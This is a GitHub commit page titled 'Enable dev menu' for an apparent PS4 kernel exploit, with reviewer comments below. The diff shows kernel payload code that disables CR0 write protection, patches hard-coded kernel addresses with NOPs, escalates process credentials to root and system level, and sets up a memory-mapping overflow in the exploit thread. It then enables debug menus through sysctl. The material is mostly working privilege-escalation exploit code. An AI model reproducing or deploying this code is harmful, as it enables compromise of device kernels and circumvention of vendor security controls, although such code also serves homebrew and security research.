Permalink
Browse files

Enable dev menu

Thanks, flatz :)
  • Loading branch information...
CTurt committed Apr 27, 2016
1 parent c8f27db commit 0028afaf0ef9b2581d47ec4d32ebb4c75db9d576
Showing with 22 additions and 9 deletions.
  1. +22 −9 source/main.c
@@ -32,12 +32,17 @@ void payload(struct knote *kn) {
// Disable write protection
uint64_t cr0 = readCr0();
writeCr0(cr0 & ~X86_CR0_WP);
// Patch functions here if required
// sysctl_machdep_rcmgr_debug_menu and sysctl_machdep_rcmgr_store_moe
*(uint16_t *)0xFFFFFFFF82607C46 = 0x9090;

This comment has been minimized.

@balika011

balika011 May 1, 2016

Its just a bypass for word_FFFFFFFF833242F6 & 4 in FFFFFFFF826073B0

*(uint16_t *)0xFFFFFFFF82607826 = 0x9090;

This comment has been minimized.

@balika011

balika011 May 1, 2016

its just a bypass for word_FFFFFFFF833242F6 & 0x10 in FFFFFFFF826077D0

*(char *)0xFFFFFFFF8332431A = 1;

This comment has been minimized.

@balika011

balika011 May 1, 2016

bIsAllowDebugSoftWagnerClock

*(char *)0xFFFFFFFF83324338 = 1;

This comment has been minimized.

@balika011

balika011 May 1, 2016

bIsAllowAdClock, bIsStoreMode, also used in FFFFFFFF826077D0

// Restore write protection
writeCr0(cr0);
// Resolve creds
cred = td->td_proc->p_ucred;
@@ -48,7 +53,7 @@ void payload(struct knote *kn) {
cred->cr_groups[0] = 0;
void *td_ucred = *(void **)(((char *)td) + 304); // p_ucred == td_ucred
// sceSblACMgrIsSystemUcred
uint64_t *sonyCred = (uint64_t *)(((char *)td_ucred) + 96);
*sonyCred = 0xffffffffffffffff;
@@ -101,11 +106,8 @@ void *exploitThread(void *none) {
uint64_t mappingSize = (copySize + PAGE_SIZE - 1) & ~(PAGE_SIZE - 1);
uint8_t *mapping = mmap(NULL, mappingSize + PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
// Ensure end of mapping is unmapped
munmap(mapping + mappingSize, PAGE_SIZE);
// buffer + copySize points to unmapped memory
uint8_t *buffer = mapping + mappingSize - copySize;
int64_t count = (0x100000000 + bufferSize) / 4;
@@ -246,7 +248,18 @@ int _main(void) {
printfsocket("[+] Kernel patch success!\n");
// Do any post-exploit stuff here
// Enable debug menu
int (*sysctlbyname)(const char *name, void *oldp, size_t *oldlenp, const void *newp, size_t newlen) = NULL;
RESOLVE(libKernelHandle, sysctlbyname);
uint32_t enable;
size_t size;
enable = 1;
size = sizeof(enable);
sysctlbyname("machdep.rcmgr_utoken_store_mode", NULL, NULL, &enable, size);
sysctlbyname("machdep.rcmgr_debug_menu", NULL, NULL, &enable, size);
#ifdef DEBUG_SOCKET
munmap(dump, PAGE_SIZE);

2 comments on commit 0028afa

@chronoss09

This comment has been minimized.

chronoss09 replied Apr 28, 2016

Good work, thanks ;)

@Anonymodmous

This comment has been minimized.

Anonymodmous replied Jul 31, 2016

Very goof work

Please sign in to comment.